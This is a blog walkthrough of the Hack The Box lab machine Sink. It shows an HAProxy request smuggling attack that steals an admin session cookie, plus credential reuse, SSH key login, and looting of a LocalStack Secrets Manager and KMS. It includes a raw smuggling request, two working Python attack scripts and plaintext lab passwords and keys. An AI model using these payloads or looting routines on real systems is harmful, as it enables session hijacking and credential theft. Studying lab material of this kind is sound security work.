Sink From Hack The Box.
Hello everyone, welcome to my blog. In this post I'm going to show you how to get root on Sink, an Insane-rated machine from Hack The Box created by MrR3boot.
Let's begin with an nmap scan.
Nmap scan report (screenshot).
There are 3 open ports:
1) 22 : SSH
2) 3000 : Gitea 1.12.6 (nmap's service guess is "ppp", but it is HTTP)
3) 5000 : Gunicorn 20.0.0 (nmap's service guess is "upnp", but it is HTTP)
So both 3000 and 5000 serve web applications.
Enumerating both websites the usual way got me nothing. Intercepting the requests with Burp Suite, on the other hand, turned up a lot of information.
Now let's intercept http://sink.htb:5000 and http://sink.htb:3000 (update your /etc/hosts file).
After intercepting http://sink.htb:3000 using burpsuite I found some cookies. Copy them.
Copy those cookies.
Then move on to http://sink.htb:5000, create an account and log in with those credentials.
Intercept the home page request in Burp and you will get a session cookie. Copy that cookie too.
Copy that cookie (screenshot).
Now let's dig deeper. I intercepted http://sink.htb:5000/ again and sent it to Repeater, and the response headers are where the juicy information is: the site is served by Gunicorn sitting behind HAProxy.
Searching for HAProxy exploits turned up one that fits this setup: an HTTP Request Smuggling vulnerability. The idea is that HAProxy decides where our request ends using Content-Length, while Gunicorn decides using Transfer-Encoding: chunked, so any bytes we append after the chunked body are left sitting on the backend connection and get parsed as the beginning of the next request.
Watch this video (and read the accompanying article) for a better understanding of HAProxy HTTP Request Smuggling. After that, it's time to get admin access.
Now post a comment on http://sink.htb:5000/, intercept the request with Burp Suite and send it to Repeater (screenshot: Leave a Comment form). This comment request is the one we turn into the HTTP Request Smuggling exploit.
Keep the _csrf and i_like_gitea cookies you copied earlier and leave the session cookie as it is.
Following the PoC, the request in Repeater needs to look like the one below. Keep the blank line between the headers and the chunked body, the one after the final 0 chunk, and the one between the smuggled request's headers and its body; without them the framing is wrong.
///// Request for the Repeater tab
Host: 10.10.10.225:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 648
Origin: http://10.10.10.225:5000
Connection: keep-alive
DNT: 1
Referer: http://10.10.10.225:5000/home
Cookie: {Your Cookies}
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

5
msg=a
0

POST /comment HTTP/1.1
Host: localhost:5000
Cookie: {Your Cookies}
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
Connection: keep-alive

msg=
//////
Once the request is in place, click the \n button next to "Raw" (available from Burp Suite 2020.12) so that non-printable characters are shown, as in the photo below. This matters because the PoC does not use a plain "Transfer-Encoding: chunked" header: it puts a non-printable character (a vertical tab, \x0b, or a form feed, \x0c) between the colon and "chunked". HAProxy does not recognise that value as chunked and frames the request by the outer Content-Length (which must cover the chunked body plus the whole smuggled request), while Gunicorn strips the character, sees chunked, and stops at the 0 chunk. The second POST /comment is then left waiting on the backend connection with a Content-Length (300) much larger than its body (msg=).
Click \n beside the Raw button in order to see and insert that character (screenshot).
Send the request and reload your home page. The next request that reaches the backend, the admin's, is consumed as the rest of that smuggled comment body, so its headers, including the admin session cookie, show up as a comment. Copy the admin session cookie and set it with a cookie editor or via your browser's inspect element.
And boom, we are admin.
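To make the mechanism concrete, here is an added example (not the writeup's or the PoC author's code) that builds the same payload with every Content-Length computed instead of hand-counted, and then simulates the frontend/backend desync offline so you can see exactly what Gunicorn stores as the smuggled comment. It assumes the obfuscated header uses a form feed (\x0c) between the colon and "chunked", as in the public HAProxy PoC; the host, cookie values and the admin request are placeholders I constructed.

```python
"""Added example, not from the original writeup: CL.TE request smuggling payload
for the HAProxy -> gunicorn chain, plus an offline simulation of the desync.
Assumptions: \x0c between 'Transfer-Encoding:' and 'chunked' (public PoC);
host/cookie values are placeholders; the admin request in demo() is constructed."""
import socket

CRLF = b"\r\n"
FRONTEND_STRIP = b" \t"          # HAProxy trims only SP/HTAB around header values
BACKEND_STRIP = b" \t\x0b\x0c"   # Python's str.strip() (gunicorn) also eats VT/FF


def smuggled_request(cookie, capture_len=300, host=b"localhost:5000"):
    """Second request the backend will see. Its Content-Length exceeds the 'msg='
    actually sent, so gunicorn keeps reading: the next request on the connection
    (the admin's headers) becomes the rest of the comment body."""
    return (b"POST /comment HTTP/1.1" + CRLF
            + b"Host: " + host + CRLF
            + b"Cookie: " + cookie + CRLF
            + b"Content-Type: application/x-www-form-urlencoded" + CRLF
            + b"Content-Length: " + str(capture_len).encode() + CRLF
            + b"Connection: keep-alive" + CRLF + CRLF
            + b"msg=")


def outer_request(cookie, host=b"10.10.10.225:5000",
                  te_header=b"Transfer-Encoding:\x0cchunked"):
    """The request you paste into Repeater: a harmless chunked comment ('msg=a')
    followed by the smuggled request; the outer Content-Length covers both."""
    chunked = b"5" + CRLF + b"msg=a" + CRLF + b"0" + CRLF + CRLF
    body = chunked + smuggled_request(cookie)
    return (b"POST /comment HTTP/1.1" + CRLF
            + b"Host: " + host + CRLF
            + b"Cookie: " + cookie + CRLF
            + b"Content-Type: application/x-www-form-urlencoded" + CRLF
            + b"Content-Length: " + str(len(body)).encode() + CRLF  # HAProxy frames by this
            + te_header + CRLF                                      # gunicorn frames by this
            + b"Connection: keep-alive" + CRLF + CRLF
            + body)


def parse_request(raw, strip):
    """Split one request into (request line, {lower-cased name: value}, remainder)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip(strip)
    return lines[0], headers, rest


def haproxy_frames(stream):
    """Frontend view: '\x0cchunked' != 'chunked', so Content-Length decides the
    message length and the whole payload is forwarded as one request."""
    _, headers, rest = parse_request(stream, FRONTEND_STRIP)
    if headers.get(b"transfer-encoding") == b"chunked":
        raise ValueError("frontend decodes chunked itself; the smuggle would fail")
    length = int(headers[b"content-length"])
    return rest[:length], rest[length:]


def gunicorn_frames(stream):
    """Backend view: after stripping, the header reads 'chunked', so the body ends
    at the 0 chunk and whatever follows is the start of the *next* request."""
    _, headers, rest = parse_request(stream, BACKEND_STRIP)
    if headers.get(b"transfer-encoding") != b"chunked":
        raise ValueError("backend did not see chunked; nothing is smuggled")
    body, pos = b"", 0
    while True:
        eol = rest.index(CRLF, pos)
        size = int(rest[pos:eol], 16)
        pos = eol + 2
        if size == 0:
            return body, rest[pos + 2:]      # skip the empty line after the last chunk
        body += rest[pos:pos + size]
        pos += size + 2


def demo(cookie=b"session=attacker-session"):
    """Offline run. Returns (body of the harmless first comment, body gunicorn
    assembles for the smuggled comment once the admin's request arrives)."""
    payload = outer_request(cookie)
    _, left_at_proxy = haproxy_frames(payload)
    assert left_at_proxy == b""              # proxy believes it forwarded one request
    first_body, leftover = gunicorn_frames(payload)
    admin = (b"GET /notes HTTP/1.1" + CRLF + b"Host: localhost:5000" + CRLF
             + b"Cookie: session=ADMIN-SESSION" + CRLF + CRLF)  # constructed victim
    _, headers, rest = parse_request(leftover + admin, BACKEND_STRIP)
    wanted = int(headers[b"content-length"])
    return first_body, rest[:wanted]         # admin's headers land inside 'msg='


def send_raw(host, port, payload):
    """Deliver the exact bytes; a raw socket never 'cleans up' the \x0c like a browser would."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(payload)
        return sock.recv(4096)


if __name__ == "__main__":
    first, captured = demo()
    print("first comment body :", first)
    print("smuggled comment   :", captured)
```

The simulation is the check worth doing before firing at the target: if haproxy_frames raises, your frontend would decode the chunks itself and nothing is smuggled; if gunicorn_frames raises, the backend did not see "chunked" and the second request is simply part of the first comment's body.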
Now let's recon the website again, this time as admin. After some time I navigated to the Notes directory and found 3 notes written by admin. Let's read them.
1) Chef Login : http://chef.sink.htb (1st note details)
Username : chefadm
Password : /6'fEGC&zEx{4]zz
2) Dev Node URL : http://code.sink.htb (2nd note details)
Username : root
Password : FaH@3L>Z3})zzfQ3
3) Nagios URL : https://nagios.sink.htb (3rd note details)
Username : nagios_adm
Password : g8<H6GK\{*L.fB3C
After a while I thought to try these credentials on the Gitea site at http://sink.htb:3000.
Let's check them.
The 1st and 3rd sets gave me no luck.
But the 2nd set (root / FaH@3L>Z3})zzfQ3) logged me in as root on Gitea.
Now let's look at each repository.
After a lot of time I found 2 useful things, both in the commit history rather than in the current files:
1) Marcus's SSH key, in the Key_Generation repository: go to Commits and open "Adding EC2 Key Management Structure".
2) AWS access and secret keys, in the Log_Management repository: go to Commits and open "Preparing for prod".
Copy the SSH key, set the permissions and SSH in as marcus:
1) Save the key into a file, e.g. key_marcus
2) chmod 600 key_marcus (ssh refuses a private key that other users can read)
3) ssh -i key_marcus marcus@sink.htb
And boom, we have a user shell (low-privileged).
user.txt is in /home/marcus.
Privilege escalation (this part was terrible!):
After enumerating for a long time I finally remembered the AWS access key and secret key from the Log_Management repository.
Let's use them to configure the AWS CLI in the marcus shell.
Type the commands below:
marcus@sink:~$ aws configure
AWS Access Key ID [****************ITJQ]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [****************0ddF]: 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
Default region name [eu]: eu
Default output format [json]: json
marcus@sink:~$
Then list the secrets. Note the --endpoint-url: these credentials are not for real AWS but for a local AWS-compatible service on 127.0.0.1:4566 (the default edge port of LocalStack):
marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets
The list includes a "Jira Support" secret; fetching its value gives us david's username and password:
marcus@sink:~$ aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-NDuqV"
Username: david
Password: EALB=bcC=`a7f2#k
Let's su to david:
marcus@sink:~$ su david
Password: EALB=bcC=`a7f2#k
And boom, we are david.
Now, to get a root shell, look at david's home directory.
The only directory there is Projects, which contains Prod_Deployment. Go into it.
In Prod_Deployment there is an encrypted file, servers.enc.
After a lot of time and analysis I worked out that it was encrypted with a KMS key held in the same local AWS service, so the same credentials let us list the keys.
The AWS CLI keeps its config in the user's home directory, so configure it again in the david shell:
david@sink:~$ aws configure
AWS Access Key ID [****************ITJQ]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [****************0ddF]: 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
Default region name [eu]: eu
Default output format [json]: json
Now list the KMS keys:
david@sink:~$ aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys
We don't know which key encrypted servers.enc, and some of the keys are disabled, so enable every key and try to decrypt with each one. The wrong keys error out; the right one prints the plaintext:
david@sink:~$ ENDPOINT="http://127.0.0.1:4566/"
david@sink:~$ for KEY in $(aws --endpoint-url="$ENDPOINT" kms list-keys --query 'Keys[].KeyId' --output text); do
    aws --endpoint-url="$ENDPOINT" kms enable-key --key-id "$KEY"   # disabled keys refuse Decrypt
    aws --endpoint-url="$ENDPOINT" kms decrypt --key-id "$KEY" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext" 2>/dev/null
done
One of the keys works. The CLI prints the Plaintext base64-encoded, so decode it (CyberChef, or base64 -d) and you get the admin credentials:
Username: admin
Password: _uezduQ!EY5AHfe2
That password is reused for root: su root with it and we have a root shell.
root.txt is in /root.
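The Secrets Manager and KMS steps above, as an added example in boto3 (this is my code, not the writeup's or LocalStack's). It generalises the one-off CLI calls: it pages through every secret and every key, enables disabled keys, tries each key against the ciphertext and returns the raw plaintext (the CLI base64-encodes Plaintext; boto3 hands back bytes). It assumes the LocalStack edge endpoint http://127.0.0.1:4566 and the leaked Log_Management credentials; the clients are injected so the logic also runs against the constructed fakes at the bottom, which is how it runs when no LocalStack is reachable.

```python
"""Added example, not from the original writeup: loot a local AWS-compatible
service (LocalStack) with boto3. Assumptions: endpoint 127.0.0.1:4566, the
leaked credentials below, and that servers.enc was encrypted with one of the
KMS keys using RSAES_OAEP_SHA_256 (as in the writeup's CLI loop)."""

ENDPOINT = "http://127.0.0.1:4566"
ACCESS_KEY = "AKIAIUEN3QWCPSTEITJQ"                       # from the Log_Management commit
SECRET_KEY = "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"


def dump_secrets(sm):
    """Return {name: SecretString} for every secret, following NextToken pagination."""
    found, token = {}, None
    while True:
        page = sm.list_secrets(**({"NextToken": token} if token else {}))
        for entry in page.get("SecretList", []):
            value = sm.get_secret_value(SecretId=entry["ARN"])
            found[entry["Name"]] = value.get("SecretString")
        token = page.get("NextToken")
        if not token:
            return found


def decrypt_with_any_key(kms, ciphertext, algorithm="RSAES_OAEP_SHA_256"):
    """Try every key in the account; return (key_id, plaintext bytes) or None.
    Disabled keys refuse Decrypt, so each key is enabled first (noisy, but that
    is exactly what the CLI loop does). Wrong keys raise and are skipped."""
    marker = None
    while True:
        page = kms.list_keys(**({"Marker": marker} if marker else {}))
        for key in page.get("Keys", []):
            key_id = key["KeyId"]
            try:
                kms.enable_key(KeyId=key_id)
                out = kms.decrypt(KeyId=key_id, CiphertextBlob=ciphertext,
                                  EncryptionAlgorithm=algorithm)
            except Exception:        # IncorrectKeyException, InvalidCiphertextException, ...
                continue
            return key_id, out["Plaintext"]   # raw bytes; the CLI would print base64
        marker = page.get("NextMarker") if page.get("Truncated") else None
        if not marker:
            return None


class FakeSecretsManager:
    """Constructed stand-in for boto3's secretsmanager client (offline demo only)."""
    def list_secrets(self, **kwargs):
        return {"SecretList": [{"Name": "Jira Support", "ARN": "arn:fake:jira"}]}

    def get_secret_value(self, SecretId):
        return {"SecretString": '{"username":"david","password":"x"}'}


class FakeKMS:
    """Constructed stand-in for boto3's kms client: two keys, only the second fits."""
    def __init__(self):
        self.enabled = []

    def list_keys(self, **kwargs):
        return {"Keys": [{"KeyId": "key-wrong"}, {"KeyId": "key-right"}], "Truncated": False}

    def enable_key(self, KeyId):
        self.enabled.append(KeyId)

    def decrypt(self, KeyId, CiphertextBlob, EncryptionAlgorithm):
        if KeyId != "key-right":
            raise RuntimeError("IncorrectKeyException")
        return {"Plaintext": b"admin:example-password"}   # constructed plaintext


def run_offline_demo():
    """Exercise both routines against the fakes; returns (secrets, kms hit, keys enabled)."""
    sm, kms = FakeSecretsManager(), FakeKMS()
    return dump_secrets(sm), decrypt_with_any_key(kms, b"\x00ciphertext"), kms.enabled


def live_clients():
    """Real clients against LocalStack; imported here so the module runs without boto3."""
    import boto3
    common = dict(endpoint_url=ENDPOINT, region_name="us-east-1",
                  aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
    return boto3.client("secretsmanager", **common), boto3.client("kms", **common)


if __name__ == "__main__":
    try:
        sm, kms = live_clients()
        with open("/home/david/Projects/Prod_Deployment/servers.enc", "rb") as fh:
            blob = fh.read()
    except Exception:                # no boto3 / no LocalStack / not on the box: use fakes
        sm, kms, blob = FakeSecretsManager(), FakeKMS(), b"\x00ciphertext"
    for name, value in dump_secrets(sm).items():
        print(name, "->", value)
    hit = decrypt_with_any_key(kms, blob)
    if hit:
        print("decrypted with", hit[0], ":", hit[1].decode(errors="replace"))
    else:
        print("no key could decrypt the blob")
```

The pagination handling is the part the one-liner silently skips: with more than a page of keys or secrets, grep-and-loop over a single list-keys call would miss the key you need.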
This box is really insane; hats off to MrR3boot for this amazing machine.